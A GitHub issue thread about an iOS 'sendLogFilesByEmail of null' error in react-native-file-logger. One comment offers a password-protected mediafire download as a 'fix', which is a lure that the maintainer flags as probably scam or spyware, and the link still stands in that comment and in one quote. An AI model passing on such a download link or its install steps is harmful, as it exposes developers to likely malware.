### ISSUE TITLE
[^0.5.5] Cannot read property sendLogFilesByEmail of null on iOS

### ISSUE THREAD

**Issue by Thaimay** [BeTomorrow/react-native-file-logger#79]
i tested on android device is normal, but on ios device I get this error.
RN: 0.71.5

TypeError: Cannot read property 'sendLogFilesByEmail' of null

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Thaimay** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

I don't understand why I need to download your fix. Can you give some reason for your fix?

**Comment by fdrault** [comment]
> > to fix your trouble try download this fix, i see it in another issue, [url] when you installing, you need to place a check in install to path and select "gcc."
> 
> I don't understand why I need to download your fix. Can you give some reason for your fix?

I edited your comment to hide the URL, it is probably a scam/spyware.

Concerning your issue, have you done `pod install` ? (or `bundle exec pod install`) in the iOS folder ?

**Comment by Thaimay** [comment]
> > > to fix your trouble try download this fix, i see it in another issue, [url] when you installing, you need to place a check in install to path and select "gcc."
> > 
> > 
> > I don't understand why I need to download your fix. Can you give some reason for your fix?
> 
> I edited your comment to hide the URL, it is probably a scam/spyware.
> 
> Concerning your issue, have you done `pod install` ? (or `bundle exec pod install`) in the iOS folder ?

Yes, of course. I build release already and tested on testflight.

**Comment by alois-beto** [comment]
closing for inactivity
